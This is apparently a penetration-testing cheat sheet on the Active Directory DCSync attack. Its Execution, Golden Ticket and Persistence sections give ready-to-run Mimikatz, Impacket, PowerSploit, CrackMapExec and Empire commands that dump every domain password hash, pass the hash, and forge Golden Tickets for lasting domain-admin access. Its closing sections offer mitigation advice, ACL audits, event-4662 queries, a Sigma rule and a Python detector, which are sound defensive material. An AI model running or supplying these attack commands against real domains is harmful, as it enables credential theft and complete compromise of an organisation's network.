🔓 DCSync Attack
🧠 Description
DCSync simulates the behavior of a Domain Controller and requests password hashes from other Domain Controllers via the Directory Replication Service (DRS) protocol. This technique allows attackers to extract all password hashes from the domain without directly accessing the NTDS.dit file.
- Valid Replication Request: DCs naturally replicate with each other
- No NTDS Access: Don't need to directly access database file
- Domain-Level Access: Any account with Replicating Directory Changes permissions
- krbtgt Hash: Allows Golden Ticket creation for persistence
Required Permissions:
- Replicating Directory Changes (DS-Replication-Get-Changes)
- Replicating Directory Changes All (DS-Replication-Get-Changes-All)
- Replicating Directory Changes In Filtered Set (DS-Replication-Get-Changes-In-Filtered-Set)
Accounts with these rights: Domain Admins, Enterprise Admins, Domain Controller accounts, accounts explicitly granted these permissions.
💣 Execution
Mimikatz - DCSync:
# Get all hashes
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /all" "exit"
# Get specific user hash
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /user:administrator" "exit"
# Get krbtgt hash for golden ticket
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /user:krbtgt" "exit"
# /guid: selects the target by its object GUID rather than by name
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:corp.com /guid:<krbtgt-object-guid>" "exit"
Impacket (Linux):
# Secretsdump - extract all hashes (DCSync over DRSUAPI against a DC)
python3 secretsdump.py corp.com/username:password@dc01.corp.com
# With hash (pass-the-hash; format is LM:NT, LM part left empty)
python3 secretsdump.py corp.com/username@dc01.corp.com -hashes :ntlmhash
# Same, authenticating as a different account with its NT hash
python3 secretsdump.py -hashes :adminhash corp.com/attacker@dc01.corp.com
# Target specific DC
python3 secretsdump.py corp.com/user:pass@dc02.corp.com
PowerShell (PowerSploit):
# Using PowerView
Import-Module .\PowerView.ps1
# Check who has replication rights on the domain head (ObjectAceType holds the resolved right name with -ResolveGUIDs)
Get-DomainObjectAcl -SearchBase "DC=corp,DC=com" -SearchScope Base -ResolveGUIDs | Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' } | Select-Object SecurityIdentifier, ObjectAceType
# Perform DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.com /all"'
# Specific user
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.com /user:corp\administrator"'
CrackMapExec:
# NTDS dump through DCSync (DRSUAPI). --local-auth authenticates against the local SAM, so it must not be combined with a domain account
crackmapexec smb dc01.corp.com -u username -p password -d corp.com --ntds
# With hash
crackmapexec smb dc01.corp.com -u username -H ntlmhash -d corp.com --ntds
🎫 Golden Ticket from DCSync
Once you have the krbtgt hash, you can create a Golden Ticket for permanent domain access:
# Get these values from DCSync output:
# - krbtgt NTLM hash
# - Domain SID (S-1-5-21-xxxxx)
# - Domain name (corp.com)
# - Domain Controller FQDN (dc01.corp.com)
# Create Golden Ticket
mimikatz "kerberos::golden /domain:corp.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4:krbtgt_ntlm_hash /user:Administrator /ticket:golden.kirbi" "exit"
# Use Golden Ticket (pass-the-ticket)
mimikatz "kerberos::ptt golden.kirbi" "exit"
# Now access any resource as DA
dir \\dc01.corp.com\c$
Empire/Covenant:
# Empire
usemodule credentials/invoke-mimikatz
execute
# DCSync will dump all hashes
# Use krbtgt hash for golden ticket
# Covenant
implant/dcsync
# Select krbtgt account
# Will dump all hashes
🎯 Persistence via DCSync
1. KRBTGT Rotation Abuse:
# DCSync gives you current KRBTGT hash
# Even after password reset, old hash still works for ~21 days
# By default, KRBTGT password changes every 30 days
# Reset it twice to invalidate all existing TGTs
# But you have the old hash, so you can forge TGTs anytime
2. Add Domain Admin via DCSynced Hash:
# Create Golden Ticket with DA privileges embedded
mimikatz "kerberos::golden /domain:corp.com /sid:SID /rc4:HASH /user:FAKE_ADMIN /groups:512 /ticket:evil.kirbi" "exit"
# Groups 512 = Domain Admins RID
# Now you have TGT that grants DA access without being actual DA
💥 Impact
- Complete Domain Compromise: All password hashes exposed
- Permanent Access: Golden Ticket from krbtgt hash
- Pass-the-Hash: Use any user's hash for lateral movement
- Trust Exploitation: Use krbtgt to access trusted domains
- Detection Bypass: No files written to disk
🛡️ Mitigation
- Limit Replication Rights: Only DCs should have Replicating Directory Changes
- Privileged Role Management: Use PIM/JIT for admin tasks
- Monitor Replication Events: Alert on unexpected DCSync
- Enable Microsoft Defender for Identity: Detect DCSync
- Audit ACLs: Find users with replication permissions
- KRBTGT Rotation: Reset twice during incident response
Audit Replication Permissions:
# Find who has replication rights on the domain head (AD module; the AD: drive needs it loaded)
Import-Module ActiveDirectory
# GUIDs: DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set
$replicationGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', '89e95b76-444d-4c62-991a-0facbeda640c'
(Get-Acl "AD:\DC=corp,DC=com").Access | Where-Object { $_.ObjectType.ToString() -in $replicationGuids } | Select-Object IdentityReference, ObjectType, AccessControlType
# PowerView audit (ObjectAceType holds the resolved right name when -ResolveGUIDs is used)
Import-Module .\PowerView.ps1
Get-DomainObjectAcl -SearchBase "DC=corp,DC=com" -SearchScope Base -ResolveGUIDs | Where-Object { $_.ObjectAceType -match 'DS-Replication-Get-Changes' }
# Anything listed above that is not a DC computer account (member of Domain Controllers) or a built-in admin group warrants review
Get-ADGroupMember "Domain Controllers"
🔍 Detection
Event ID Monitoring:
# Event ID 4662 - An operation was performed on an object (Directory Service Access)
# A DCSync request logs a 4662 with Access Mask 0x100 (control access) on the domain head
# (object type domainDNS) whose Properties field lists the replication right GUIDs:
#   1131f6aa-... = DS-Replication-Get-Changes, 1131f6ad-... = DS-Replication-Get-Changes-All
# Look for requesters that are not Domain Controller computer accounts
Get-WinEvent -FilterHashtable @{LogName='Security';ID=4662} |
Where-Object { $_.Message -match '1131f6a[ad]-9c07-11d1-f79f-00c04fc2dcd2' -and $_.Message -match 'Access Mask:\s+0x100' } |
ForEach-Object { ([xml]$_.ToXml()).Event.EventData.Data | Where-Object Name -eq 'SubjectUserName' | Select-Object -ExpandProperty '#text' } |
Where-Object { $_ -notmatch '\$$' } | Group-Object | Sort-Object Count -Descending
# Event ID 5136 - Directory Service Object Modification (object ACLs changed, e.g. replication rights granted)
# Event ID 4670 - Permissions on an object were changed
Microsoft Defender for Identity Alert:
This alert triggers when a non-Domain Controller performs replication operations. It is a clear indicator of a DCSync attack. Known legitimate non-DC replicators, such as the Azure AD Connect service account (MSOL_ prefix), need to be excluded in the alert configuration to avoid false positives.
Sigma Rule:
title: DCSync Attack Detection
id: dcsync-detection
status: experimental
description: Replication rights (DS-Replication-Get-Changes*) requested by a principal that is not a Domain Controller computer account
logsource:
    product: windows
    service: security
detection:
    selection:
        EventID: 4662
        AccessMask: 0x100
        Properties|contains:
            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes
            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'   # DS-Replication-Get-Changes-All
    filter_dc_accounts:
        SubjectUserName|endswith: '$'
    condition: selection and not filter_dc_accounts
falsepositives:
    - Azure AD Connect (MSOL_ account) and other legitimate directory synchronisation accounts
level: critical
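The detection logic from the Sigma rule and the 4662 query above, as an added example that is not part of the original page, run in Python over constructed 4662 records. It goes one step further than the rule: instead of the bare '$' suffix filter it uses an explicit allow-list of DC computer accounts (the output of Get-ADGroupMember "Domain Controllers"), so a replication request from a non-DC machine account is still flagged. The names SAMPLE_EVENTS, DC_ACCOUNTS, is_dcsync and find_dcsync are assumptions of this example.

```python
import re

# Replication control-access-right GUIDs a DCSync request asks for
REPLICATION_RIGHT_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
    "89e95b76-444d-4c62-991a-0facbeda640c",  # DS-Replication-Get-Changes-In-Filtered-Set
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)
CONTROL_ACCESS = 0x100  # Access Mask bit for control-access rights

def is_dcsync(event, dc_accounts):
    """True when a 4662 record is a replication request by a non-DC principal."""
    if event.get("EventID") != 4662:
        return False
    # AccessMask is logged as a hex string such as "0x100"
    if int(str(event.get("AccessMask", "0")), 0) & CONTROL_ACCESS == 0:
        return False
    requested = {g.lower() for g in GUID_RE.findall(event.get("Properties", ""))}
    if not requested & REPLICATION_RIGHT_GUIDS:
        return False
    # Only Domain Controller computer accounts replicate legitimately
    return event.get("SubjectUserName", "").upper() not in {a.upper() for a in dc_accounts}

def find_dcsync(events, dc_accounts):
    """Return the requesting account of every suspicious replication request."""
    return [e["SubjectUserName"] for e in events if is_dcsync(e, dc_accounts)]

# Constructed sample records; field names follow the Security log EventData names
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",   # normal DC replication
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x100",    # user account: DCSync
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}\r\n\t{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "AccessMask": "0x10",     # ordinary attribute write
     "Properties": "{00000000-0000-0000-0000-000000000001}"},               # constructed, not a replication right
    {"EventID": 4662, "SubjectUserName": "WS01$", "AccessMask": "0x100",   # non-DC machine account
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]
DC_ACCOUNTS = {"DC01$", "DC02$"}  # constructed; take this from Get-ADGroupMember "Domain Controllers"

if __name__ == "__main__":
    for who in find_dcsync(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"possible DCSync by {who}")
```

The third record shows why Access Mask and Properties are both checked: a 4662 on the domain head with an unrelated property and no control-access bit is routine directory activity, not replication.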
🛠️ Tools
- Mimikatz: lsadump::dcsync
- Impacket (secretsdump): Python implementation
- PowerView: PowerShell enumeration
- CrackMapExec: --ntds (DCSync over DRSUAPI)
- Empire: DCSync module
- BloodHound: Identify accounts with replication rights